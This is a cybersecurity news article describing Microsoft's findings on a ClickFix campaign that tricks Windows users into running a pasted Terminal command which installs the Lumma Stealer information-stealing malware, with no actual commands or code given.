Microsoft has recently revealed details about a new cyberattack campaign that is using a social-engineering technique called ClickFix. This campaign is designed to infect Windows computers with a well-known malware called Lumma Stealer. Instead of exploiting a software vulnerability, the attackers trick users into running a malicious command themselves. Once the command is executed in Windows Terminal, the malware begins its activity on the system.

Abstract Windows operating system background representing Microsoft security concerns and Windows Terminal related cyber threats.

According to Microsoft’s security researchers, the attack mainly depends on human interaction and deception. Victims are usually directed to malicious or compromised websites through phishing emails, fake advertisements, or manipulated search results. When a user opens the webpage, they are shown a message claiming that something is wrong with their browser. The page then instructs them to perform a quick “fix” to solve the problem.

These fake pages often display instructions telling the user to copy a command and run it on their computer. The instructions may ask them to open Windows Terminal or the Run dialog box and paste the command. The message usually claims that running the command will verify the user or fix a technical error. Because the instructions appear simple and official, many users follow them without realizing the risk.

Illustration of users working on laptops around a large command terminal screen representing command execution and potential cybersecurity risks.

However, the command provided on the webpage is actually malicious. When the victim runs it, the command connects the system to attacker-controlled servers. This allows additional malicious files to be downloaded to the device. The process then installs Lumma Stealer, which starts collecting information from the infected computer.

Microsoft explains that this attack method is dangerous because the user executes the command themselves. Many security tools focus on detecting automatic malware downloads or suspicious system behavior. In this case, the activity may appear normal because the user willingly runs the command. This makes it harder for traditional defenses to detect the attack early.

Illustration of a hacker stealing personal information and credentials from a computer system during a cyberattack.

The malware used in this campaign, Lumma Stealer, is a well-known information-stealing malware. It is often sold through underground cybercrime markets using a malware-as-a-service model. Once it infects a system, the malware quietly collects valuable data from the victim’s device. This data is then sent back to servers controlled by the attackers.

Lumma Stealer can steal many types of sensitive information from infected systems. This includes saved browser passwords, login credentials, session cookies, and cryptocurrency wallet data. It can also collect financial information, system details, and files stored on the device. After gathering the data, the malware sends it to remote servers controlled by cybercriminals.

Digital illustration of a cryptocurrency wallet representing malware stealing financial and crypto wallet data from infected systems.

Security researchers say that ClickFix attacks are becoming more common in recent cyber campaigns. Instead of exploiting software weaknesses, attackers manipulate users into performing the harmful action themselves. By combining social engineering with legitimate tools like Windows Terminal, attackers can make the activity appear normal. This campaign shows how modern cyberattacks increasingly target human behavior rather than just technology.

Stay alert, and keep your security measures updated!

Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news